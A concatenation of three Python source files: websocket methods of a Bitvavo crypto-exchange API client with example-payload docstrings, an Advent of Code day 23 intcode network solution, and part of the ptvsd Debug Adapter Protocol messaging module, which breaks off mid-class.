"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
# A whole list of these
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
self.callbacks["getOrders"] = callback
options["action"] = "privateGetOrders"
options["market"] = market
self.doSend(self.ws, json.dumps(options), True)
def cancelOrders(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Cancel all existing orders for a specific market (or account)
---
Args:
```python
options={} # WARNING - WILL REMOVE ALL OPEN ORDERS ON YOUR ACCOUNT!
options={"market":"BTC-EUR"} # Removes all open orders for this market
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
# A whole list of these
[
{"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6"}
]
```
"""
self.callbacks["cancelOrders"] = callback
options["action"] = "privateCancelOrders"
self.doSend(self.ws, json.dumps(options), True)
def ordersOpen(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all open orders, either for all markets, or a single market
---
Args:
```python
options={} # Gets all open orders for all markets
options={"market":"BTC-EUR"} # Get open orders for this market
callback=callback_example
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns this to `callback`:
```python
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
self.callbacks["ordersOpen"] = callback
options["action"] = "privateGetOrdersOpen"
self.doSend(self.ws, json.dumps(options), True)
def trades(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all historic trades from this account
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"id": "108c3633-0276-4480-a902-17a01829deae",
"orderId": "1d671998-3d44-4df4-965f-0d48bd129a1b",
"timestamp": 1542967486256,
"market": "BTC-EUR",
"side": "buy",
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
]
```
"""
self.callbacks["trades"] = callback
options["action"] = "privateGetTrades"
options["market"] = market
self.doSend(self.ws, json.dumps(options), True)
def account(self, callback: Callable[[Any], None]) -> None:
"""Get all fees for this account
---
Args:
```python
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"fees": {
"taker": "0.0025",
"maker": "0.0015",
"volume": "10000.00"
}
}
```
"""
self.callbacks["account"] = callback
self.doSend(self.ws, json.dumps({"action": "privateGetAccount"}), True)
def balance(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the balance for this account
---
Args:
```python
options={} # return all balances
options={symbol="BTC"} # return a single balance
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"symbol": "BTC",
"available": "1.57593193",
"inOrder": "0.74832374"
}
]
```
"""
options["action"] = "privateGetBalance"
self.callbacks["balance"] = callback
self.doSend(self.ws, json.dumps(options), True)
def depositAssets(self, symbol: str, callback: Callable[[Any], None]) -> None:
"""Get the deposit address (with paymentId for some assets) or bank account information to increase your balance
---
Args:
```python
symbol="BTC"
symbol="SHIB"
symbol="EUR"
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"address": "CryptoCurrencyAddress",
"paymentId": "10002653"
}
# or
{
"iban": "NL32BUNQ2291234129",
"bic": "BUNQNL2A",
"description": "254D20CC94"
}
```
"""
self.callbacks["depositAssets"] = callback
self.doSend(
self.ws,
json.dumps({"action": "privateDepositAssets", "symbol": symbol}),
True,
)
def depositHistory(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the deposit history of the account
Even when you want something from a single `symbol`, you'll still receive a list with multiple deposits.
---
Args:
```python
options={
"symbol":"EUR"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0"
}
]
# or
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "500",
"address": "NL32BITV0001234567",
"fee": "0"
}
]
```
"""
self.callbacks["depositHistory"] = callback
options["action"] = "privateGetDepositHistory"
self.doSend(self.ws, json.dumps(options), True)
def withdrawAssets(
self,
symbol: str,
amount: str,
address: str,
body: anydict,
callback: Callable[[Any], None],
) -> None:
"""Withdraw a coin/token to an external crypto address or bank account.
---
Args:
```python
symbol="SHIB"
amount=10
address="BitcoinAddress", # Wallet address or IBAN
options={
"paymentId": "10002653", # For digital assets only. Should be set when withdrawing straight to another exchange or merchants that require payment id's.
"internal": false, # For digital assets only. Should be set to true if the withdrawal must be sent to another Bitvavo user internally
"addWithdrawalFee": false # If set to true, the fee will be added on top of the requested amount, otherwise the fee is part of the requested amount and subtracted from the withdrawal.
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"success": true,
"symbol": "BTC",
"amount": "1.5"
}
```
"""
self.callbacks["withdrawAssets"] = callback
body["action"] = "privateWithdrawAssets"
body["symbol"] = symbol
body["amount"] = amount
body["address"] = address
self.doSend(self.ws, json.dumps(body), True)
def withdrawalHistory(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the withdrawal history
---
Args:
```python
options={
"symbol":"SHIB"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0.00006",
"status": "awaiting_processing"
}
}
```
"""
self.callbacks["withdrawalHistory"] = callback
options["action"] = "privateGetWithdrawalHistory"
self.doSend(self.ws, json.dumps(options), True)
def subscriptionTicker(self, market: str, callback: Callable[[Any], None]) -> None:
# TODO(NostraDavid) one possible improvement here is to turn `market` into a list of markets, so we can sub to all of them at once. Same goes for other `subscription*()`
"""Subscribe to the ticker channel, which means `callback` gets passed the new best bid or ask whenever they change (server-side).
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"ticker": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "ticker",
"market": "BTC-EUR",
"bestBid": "9156.8",
"bestBidSize": "0.12840531",
"bestAsk": "9157.9",
"bestAskSize": "0.1286605",
"lastPrice": "9156.9"
}
```
"""
if "subscriptionTicker" not in self.callbacks:
self.callbacks["subscriptionTicker"] = {}
self.callbacks["subscriptionTicker"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "ticker", "markets": [market]}],
},
),
)
def subscriptionTicker24h(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribe to the ticker-24-hour channel, which means `callback` gets passed the new object every second, if values have changed.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"ticker": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "ticker24h",
"data": {
"market": "BTC-EUR",
"open": "9072.9",
"high": "9263.6",
"low": "9062.8",
"last": "9231.8",
"volume": "85.70530211",
"volumeQuote": "785714.14",
"bid": "9225",
"bidSize": "1.14732373",
"ask": "9225.1",
"askSize": "0.65371786",
"timestamp": 1566564813057
}
}
```
"""
if "subscriptionTicker24h" not in self.callbacks:
self.callbacks["subscriptionTicker24h"] = {}
self.callbacks["subscriptionTicker24h"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "ticker24h", "markets": [market]}],
},
),
)
def subscriptionAccount(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to the account channel, which sends an update whenever an event happens which is related to the account.
These are 'order' events (create, update, cancel) or 'fill' events (a trade occurred).
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"account": [
"BTC-EUR"
]
}
}
# and after that, either
{
"event": "order",
"orderId": "80b5f04d-21fc-4ebe-9c5f-6d34f78ee477",
"market": "BTC-EUR",
"created": 1548684420771,
"updated": 1548684420771,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "1",
"amountRemaining": "0.567",
"price": "9225.1",
"onHold": "9225.1",
"onHoldCurrency": "EUR",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC",
"postOnly": false,
"selfTradePrevention": "decrementAndCancel",
"visible": true
}
# or
{
"event": "fill",
"market": "BTC-EUR",
"orderId": "80b5f04d-21fc-4ebe-9c5f-6d34f78ee477",
"fillId": "15d14b09-389d-4f83-9413-de9d0d8e7715",
"timestamp": 1542967486256,
"amount": "0.005",
"side": "sell",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR"
}
```
"""
if "subscriptionAccount" not in self.callbacks:
self.callbacks["subscriptionAccount"] = {}
self.callbacks["subscriptionAccount"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "account", "markets": [market]}],
},
),
True,
)
def subscriptionCandles(self, market: str, interval: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to candles and returns a candle each time a new one is formed, depending on the interval
---
Args:
```python
market="BTC-EUR"
interval="1h" # Choose: 1m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"candles": {
"1h": [
"BTC-EUR"
]
}
}
}
# and after that:
{
"event": "candle",
"market": "BTC-EUR",
"interval": "1h",
"candle": [
[
1538784000000,
"4999",
"5012",
"4999",
"5012",
"0.45"
]
]
}
```
"""
if "subscriptionCandles" not in self.callbacks:
self.callbacks["subscriptionCandles"] = {}
if market not in self.callbacks["subscriptionCandles"]:
self.callbacks["subscriptionCandles"][market] = {}
self.callbacks["subscriptionCandles"][market][interval] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [
{
"name": "candles",
"interval": [interval],
"markets": [market],
},
],
},
),
)
def subscriptionTrades(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to trades, which sends an object whenever a trade has occurred.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"trades": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "trade",
"timestamp": 1566817150381,
"market": "BTC-EUR",
"id": "391f4d94-485f-4fb0-b11f-39da1cfcfc2d",
"amount": "0.00096361",
"price": "9311.2",
"side": "sell"
}
```
"""
if "subscriptionTrades" not in self.callbacks:
self.callbacks["subscriptionTrades"] = {}
self.callbacks["subscriptionTrades"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "trades", "markets": [market]}],
},
),
)
def subscriptionBookUpdate(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to the book and returns a delta on every change to the book.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"book": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "book",
"market": "BTC-EUR",
"nonce": 0,
"bids": [
["9209.3", "0"],
["9207.7", "0"],
["9206.1", "0"],
["9204.6", "0.09173282"],
["9206.3", "0.08142723"],
["9209.5", "0.1015792"],
["9207.9", "0.09120002"],
],
"asks": [
["9220.2", "0"],
["9223.4", "0"],
["9225.1", "0"],
["9228.1", "0"],
["9231.8", "0"],
["9233.6", "0"],
["9235.1", "0.51598389"],
["9233.1", "0.40684114"],
["9230.6", "0.33906266"],
["9227.2", "0.40078234"],
["9221.8", "0.30485309"],
["9225.4", "0.36040168"],
["9229", "0.36070097"],
],
}
```
"""
if "subscriptionBookUpdate" not in self.callbacks:
self.callbacks["subscriptionBookUpdate"] = {}
self.callbacks["subscriptionBookUpdate"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "book", "markets": [market]}],
},
),
)
def subscriptionBook(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to the book and returns a delta on every change to the book.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"book": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "book",
"market": "BTC-EUR",
"nonce": 0,
"bids": [
["9209.3", "0"],
["9207.7", "0"],
["9206.1", "0"],
["9204.6", "0.09173282"],
["9206.3", "0.08142723"],
["9209.5", "0.1015792"],
["9207.9", "0.09120002"],
],
"asks": [
["9220.2", "0"],
["9223.4", "0"],
["9225.1", "0"],
["9228.1", "0"],
["9231.8", "0"],
["9233.6", "0"],
["9235.1", "0.51598389"],
["9233.1", "0.40684114"],
["9230.6", "0.33906266"],
["9227.2", "0.40078234"],
["9221.8", "0.30485309"],
["9225.4", "0.36040168"],
["9229", "0.36070097"],
],
}
```
"""
self.keepBookCopy = True
if "subscriptionBookUser" not in self.callbacks:
self.callbacks["subscriptionBookUser"] = {}
self.callbacks["subscriptionBookUser"][market] = callback
if "subscriptionBook" not in self.callbacks:
self.callbacks["subscriptionBook"] = {}
self.callbacks["subscriptionBook"][market] = processLocalBook
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "book", "markets": [market]}],
},
),
)
self.localBook[market] = {}
self.doSend(self.ws, json.dumps({"action": "getBook", "market": market}))
|
dec23.py
|
#!/usr/bin/env python
# -*- coding: utf-8
from queue import Empty, Queue
from threading import Thread, Lock
from .intcode import load_program, IntCode
IDLE_THRESHOLD = 10
class Nic(object):
def __init__(self, id, inq, outq):
self._id = id
self._inq = inq
self._outq = outq
program = load_program("dec23")
self._intcode = IntCode(program)
self._thread = Thread(target=self._run, name="NIC-{}".format(id), daemon=True)
self._outgoing_packet = []
self._block = False
self._idle_counter = 0
def _input_init(self):
self._input = self._input_packet
return self._id
def _input_packet(self):
try:
value = self._inq.get(self._block)
self._block = False
self._idle_counter = 0
def packet(*args):
self._input = self._input_packet
return value[2]
self._input = packet
return value[1]
except Empty:
if self.idle:
self._block = True
self._idle_counter += 1
return -1
def _input(self):
return self._input_init()
def input(self):
return self._input()
def output(self, v):
self._idle_counter = 0
self._outgoing_packet.append(v)
if len(self._outgoing_packet) == 3:
self._outq.put(tuple(self._outgoing_packet))
self._outgoing_packet = []
def start(self):
self._thread.start()
def _run(self):
self._intcode.execute(self.input, self.output)
@property
def idle(self):
if self._idle_counter > IDLE_THRESHOLD:
return True
return False
class Nat(object):
def __init__(self, inq, outq, idle_check):
self._inq = inq
self._outq = outq
self._idle_check = idle_check
self._thread = Thread(target=self._run, name="NAT", daemon=True)
self.result = None
self._last_packet = None
self._last_y_sent = None
def start(self):
self._thread.start()
def _run(self):
while True:
try:
self._last_packet = self._inq.get_nowait()
print("Last packet updated: {!r}".format(self._last_packet))
except Empty:
pass
if self._idle_check() and self._last_packet:
packet = (0, self._last_packet[1], self._last_packet[2])
print("NAT is sending {}".format(packet))
self._outq.put(packet)
if self._last_y_sent == self._last_packet[2]:
self.result = self._last_y_sent
return
self._last_y_sent = self._last_packet[2]
class Router(object):
def __init__(self):
self._outq = Queue()
self._inq = {i: Queue() for i in range(50)}
self._inq[255] = Queue()
self._nics = [Nic(i, self._inq[i], self._outq) for i in range(50)]
self._nat = Nat(self._inq[255], self._outq, self._idle_check)
self._lock = Lock()
def start(self):
self._nat.start()
for nic in self._nics:
nic.start()
while self._nat.result is None:
packet = self._outq.get()
with self._lock:
dst = self._inq.get(packet[0])
if dst is None:
print("Received invalid packet: {!r}".format(packet))
continue
dst.put(packet)
return self._nat.result
def _idle_check(self):
with self._lock:
all_idle = all(nic.idle for nic in self._nics)
if all_idle:
print("All NICs are idle")
return all_idle
def part2():
router = Router()
result = router.start()
print("The first Y value delivered by the NAT to the computer at address 0 twice in a row: {}".format(result))
if __name__ == "__main__":
part2()
|
messaging.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, print_function, unicode_literals
"""An implementation of the session and presentation layers as used in the Debug
Adapter Protocol (DAP): channels and their lifetime, JSON messages, requests,
responses, and events.
https://microsoft.github.io/debug-adapter-protocol/overview#base-protocol
"""
import collections
import contextlib
import functools
import itertools
import os
import socket
import sys
import threading
from ptvsd.common import compat, fmt, json, log
from ptvsd.common.compat import unicode
class JsonIOError(IOError):
"""Indicates that a read or write operation on JsonIOStream has failed.
"""
def __init__(self, *args, **kwargs):
stream = kwargs.pop("stream")
cause = kwargs.pop("cause", None)
if not len(args) and cause is not None:
args = [str(cause)]
super(JsonIOError, self).__init__(*args, **kwargs)
self.stream = stream
"""The stream that couldn't be read or written.
Set by JsonIOStream.read_json() and JsonIOStream.write_json().
JsonMessageChannel relies on this value to decide whether a NoMoreMessages
instance that bubbles up to the message loop is related to that loop.
"""
self.cause = cause
"""The underlying exception, if any."""
class NoMoreMessages(JsonIOError, EOFError):
"""Indicates that there are no more messages that can be read from or written
to a stream.
"""
def __init__(self, *args, **kwargs):
args = args if len(args) else ["No more messages"]
super(NoMoreMessages, self).__init__(*args, **kwargs)
class JsonIOStream(object):
"""Implements a JSON value stream over two byte streams (input and output).
Each value is encoded as a DAP packet, with metadata headers and a JSON payload.
"""
MAX_BODY_SIZE = 0xFFFFFF
json_decoder_factory = json.JsonDecoder
"""Used by read_json() when decoder is None."""
json_encoder_factory = json.JsonEncoder
"""Used by write_json() when encoder is None."""
@classmethod
def from_stdio(cls, name="stdio"):
"""Creates a new instance that receives messages from sys.stdin, and sends
them to sys.stdout.
On Win32, this also sets stdin and stdout to binary mode, since the protocol
requires that to work properly.
"""
if sys.version_info >= (3,):
stdin = sys.stdin.buffer
stdout = sys.stdout.buffer
else:
stdin = sys.stdin
stdout = sys.stdout
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(stdin.fileno(), os.O_BINARY)
msvcrt.setmode(stdout.fileno(), os.O_BINARY)
return cls(stdin, stdout, name)
@classmethod
def from_process(cls, process, name="stdio"):
"""Creates a new instance that receives messages from process.stdin, and sends
them to process.stdout.
On Win32, this also sets stdin and stdout to binary mode, since the protocol
requires that to work properly.
"""
if sys.version_info >= (3,):
reader = process.stdout
writer = process.stdin
else:
reader = process.stdout
writer = process.stdin
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(reader.fileno(), os.O_BINARY)
msvcrt.setmode(writer.fileno(), os.O_BINARY)
return cls(reader, writer, name)
@classmethod
def from_socket(cls, sock, name=None):
"""Creates a new instance that sends and receives messages over a socket.
"""
sock.settimeout(None) # make socket blocking
if name is None:
name = repr(sock)
# TODO: investigate switching to buffered sockets; readline() on unbuffered
# sockets is very slow! Although the implementation of readline() itself is
# native code, it calls read(1) in a loop - and that then ultimately calls
# SocketIO.readinto(), which is implemented in Python.
socket_io = sock.makefile("rwb", 0)
# SocketIO.close() doesn't close the underlying socket.
def cleanup():
try:
sock.shutdown(socket.SHUT_RDWR)
except Exception:
pass
sock.close()
return cls(socket_io, socket_io, name, cleanup)
def __init__(self, reader, writer, name=None, cleanup=lambda: None):
"""Creates a new JsonIOStream.
reader must be a BytesIO-like object, from which incoming messages will be
read by read_json().
writer must be a BytesIO-like object, into which outgoing messages will be
written by write_json().
cleanup must be a callable; it will be invoked without arguments when the
stream is closed.
reader.readline() must treat "\n" as the line terminator, and must leave "\r"
as is - it must not replace "\r\n" with "\n" automatically, as TextIO does.
"""
if name is None:
name = fmt("reader={0!r}, writer={1!r}", reader, writer)
self.name = name
self._reader = reader
self._writer = writer
self._cleanup = cleanup
self._closed = False
def close(self):
"""Closes the stream, the reader, and the writer.
"""
if self._closed:
return
self._closed = True
log.debug("Closing {0} message stream", self.name)
try:
try:
# Close the writer first, so that the other end of the connection has
# its message loop waiting on read() unblocked. If there is an exception
# while closing the writer, we still want to try to close the reader -
# only one exception can bubble up, so if both fail, it'll be the one
# from reader.
try:
self._writer.close()
finally:
if self._reader is not self._writer:
self._reader.close()
finally:
self._cleanup()
except Exception:
# On Python 2, close() will raise an exception if there is a concurrent
# read() or write(), which is a common and expected occurrence with
# JsonMessageChannel, so don't even bother logging it.
if sys.version_info >= (3,):
raise log.exception("Error while closing {0} message stream", self.name)
def _log_message(self, dir, data, logger=log.debug):
format_string = "{0} {1} " + (
"{2!j:indent=None}" if isinstance(data, list) else "{2!j}"
)
return logger(format_string, self.name, dir, data)
def _read_line(self, reader):
line = b""
while True:
try:
line += reader.readline()
except Exception as ex:
raise NoMoreMessages(str(ex), stream=self)
if not line:
raise NoMoreMessages(stream=self)
if line.endswith(b"\r\n"):
line = line[0:-2]
return line
def read_json(self, decoder=None):
"""Read a single JSON value from reader.
Returns JSON value as parsed by decoder.decode(), or raises NoMoreMessages
if there are no more values to be read.
"""
decoder = decoder if decoder is not None else self.json_decoder_factory()
reader = self._reader
read_line = functools.partial(self._read_line, reader)
# If any error occurs while reading and parsing the message, log the original
# raw message data as is, so that it's possible to diagnose missing or invalid
# headers, encoding issues, JSON syntax errors etc.
def log_message_and_exception(format_string="", *args, **kwargs):
if format_string:
format_string += "\n\n"
format_string += "{name} -->\n{raw_lines}"
raw_lines = b"".join(raw_chunks).split(b"\n")
raw_lines = "\n".join(repr(line) for line in raw_lines)
return log.exception(
format_string, *args, name=self.name, raw_lines=raw_lines, **kwargs
)
raw_chunks = []
headers = {}
while True:
try:
line = read_line()
except Exception:
# Only log it if we have already read some headers, and are looking
# for a blank line terminating them. If this is the very first read,
# there's no message data to log in any case, and the caller might
# be anticipating the error - e.g. NoMoreMessages on disconnect.
if headers:
log_message_and_exception("Error while reading message headers:")
raise
raw_chunks += [line, b"\n"]
if line == b"":
break
key, _, value = line.partition(b":")
headers[key] = value
try:
length = int(headers[b"Content-Length"])
if not (0 <= length <= self.MAX_BODY_SIZE):
raise ValueError
except (KeyError, ValueError):
try:
raise IOError("Content-Length is missing or invalid:")
except Exception:
raise log_message_and_exception()
body_start = len(raw_chunks)
body_remaining = length
while body_remaining > 0:
try:
chunk = reader.read(body_remaining)
if not chunk:
raise EOFError
except Exception as exc:
log_message_and_exception(
"Couldn't read the expected {0} bytes of body:", length
)
raise NoMoreMessages(str(exc), stream=self)
raw_chunks.append(chunk)
body_remaining -= len(chunk)
assert body_remaining == 0
body = b"".join(raw_chunks[body_start:])
try:
body = body.decode("utf-8")
except Exception:
raise log_message_and_exception()
try:
body = decoder.decode(body)
except Exception:
raise log_message_and_exception()
# If parsed successfully, log as JSON for readability.
self._log_message("-->", body)
return body
def write_json(self, value, encoder=None):
"""Write a single JSON value into writer.
Value is written as encoded by encoder.encode().
"""
if self._closed:
# Don't log this - it's a common pattern to write to a stream while
# anticipating EOFError from it in case it got closed concurrently.
raise NoMoreMessages(stream=self)
encoder = encoder if encoder is not None else self.json_encoder_factory()
writer = self._writer
# Format the value as a message, and try to log any failures using as much
# information as we already have at the point of the failure. For example,
# if it fails after it is serialized to JSON, log that JSON.
try:
body = encoder.encode(value)
except Exception:
raise self._log_message("<--", value, logger=log.exception)
if not isinstance(body, bytes):
body = body.encode("utf-8")
header = fmt("Content-Length: {0}\r\n\r\n", len(body))
header = header.encode("ascii")
data = header + body
data_written = 0
try:
while data_written < len(data):
written = writer.write(data[data_written:])
# On Python 2, socket.makefile().write() does not properly implement
# BytesIO.write(), and always returns None instead of the number of
# bytes written - but also guarantees that it is always a full write.
if written is None:
break
data_written += written
writer.flush()
except Exception as exc:
self._log_message("<--", value, logger=log.exception)
raise JsonIOError(stream=self, cause=exc)
self._log_message("<--", value)
def __repr__(self):
return fmt("{0}({1!r})", type(self).__name__, self.name)
class MessageDict(collections.OrderedDict):
"""A specialized dict that is used for JSON message payloads - Request.arguments,
Response.body, and Event.body.
For all members that normally throw KeyError when a requested key is missing, this
dict raises InvalidMessageError instead. Thus, a message handler can skip checks
for missing properties, and just work directly with the payload on the assumption
that it is valid according to the protocol specification; if anything is missing,
it will be reported automatically in the proper manner.
If the value for the requested key is itself a dict, it is returned as is, and not
automatically converted to MessageDict. Thus, to enable convenient chaining - e.g.
d["a"]["b"]["c"] - the dict must consistently use MessageDict instances rather than
vanilla dicts for all its values, recursively. This is guaranteed for the payload
of all freshly received messages (unless and until it is mutated), but there is no
such guarantee for outgoing messages.
"""
def __init__(self, message, items=None):
assert message is None or isinstance(message, Message)
if items is None:
super(MessageDict, self).__init__()
else:
super(MessageDict, self).__init__(items)
self.message = message
"""The Message object that owns this dict.
For any instance exposed via a Message object corresponding to some incoming
message, it is guaranteed to reference that Message object. There is no similar
guarantee for outgoing messages.
"""
def __repr__(self):
return fmt("{0!j}", self)
def __call__(self, key, validate, optional=False):
"""Like get(), but with validation.
The item is first retrieved as if with self.get(key, default=()) - the default
value is () rather than None, so that JSON nulls are distinguishable from
missing properties.
If optional=True, and the value is (), it's returned as is. Otherwise, the
item is validated by invoking validate(item) on it.
If validate=False, it's treated as if it were (lambda x: x) - i.e. any value
is considered valid, and is returned unchanged. If validate is a type or a
tuple, it's treated as json.of_type(validate). Otherwise, if validate is not
callable(), it's treated as json.default(validate).
If validate() returns successfully, the item is substituted with the value
it returns - thus, the validator can e.g. replace () with a suitable default
value for the property.
If validate() raises TypeError or ValueError, raises InvalidMessageError with
the same text that applies_to(self.messages).
See ptvsd.common.json for reusable validators.
"""
if not validate:
validate = lambda x: x
elif isinstance(validate, type) or isinstance(validate, tuple):
validate = json.of_type(validate, optional=optional)
elif not callable(validate):
validate = json.default(validate)
value = self.get(key, ())
try:
value = validate(value)
except (TypeError, ValueError) as exc:
message = Message if self.message is None else self.message
raise message.isnt_valid("{0!r} {1}", key, exc)
return value
def _invalid_if_no_key(func):
def wrap(self, key, *args, **kwargs):
try:
return func(self, key, *args, **kwargs)
except KeyError:
message = Message if self.message is None else self.message
raise message.isnt_valid("missing property {0!r}", key)
return wrap
__getitem__ = _invalid_if_no_key(collections.OrderedDict.__getitem__)
__delitem__ = _invalid_if_no_key(collections.OrderedDict.__delitem__)
pop = _invalid_if_no_key(collections.OrderedDict.pop)
del _invalid_if_no_key
def _payload(value):
"""JSON validator for message payload.
If that value is missing or null, it is treated as if it were {}.
"""
if value is not None and value != ():
if isinstance(value, dict): # can be int, str, list...
assert isinstance(value, MessageDict)
return value
# Missing payload. Construct a dummy MessageDict, and make it look like it was
# deserialized. See JsonMessageChannel._parse_incoming_message for why it needs
# to have associate_with().
def associate_with(message):
value.message = message
value = MessageDict(None)
value.associate_with = associate_with
return value
class Message(object):
"""Represents a fully parsed incoming or outgoing message.
https://microsoft.github.io/debug-adapter-protocol/specification#protocolmessage
"""
def __init__(self, channel, seq, json=None):
self.channel = channel
self.seq = seq
"""Sequence number of the message in its channel.
This can be None for synthesized Responses.
"""
self.json = json
"""For incoming messages, the MessageDict containing raw JSON from which
this message was originally parsed.
"""
def __str__(self):
